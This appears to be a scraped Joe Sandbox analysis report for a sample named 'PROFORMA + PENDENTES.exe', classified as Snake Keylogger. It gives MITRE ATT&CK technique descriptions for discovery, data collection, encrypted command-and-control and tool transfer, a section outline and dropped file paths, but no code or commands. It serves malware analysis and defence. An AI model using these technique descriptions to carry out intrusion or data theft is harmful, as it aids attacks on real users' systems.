Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PROFORMA + PENDENTES.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PROFORMA + PENDENTES.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\WYqxTmjfOgdZ.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a41imsea.4lc.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eho15iwf.cdu.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fry22dqo.hu3.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jmysbgfb.mwn.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mnpdhtg0.q55.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s1byb13s.bgf.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yb3owk2l.o5a.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yeyidcty.klj.ps1

C:\Users\user\AppData\Local\Temp\tmp3E72.tmp

C:\Users\user\AppData\Local\Temp\tmp5B41.tmp

Windows Analysis Report
PROFORMA + PENDENTES.exe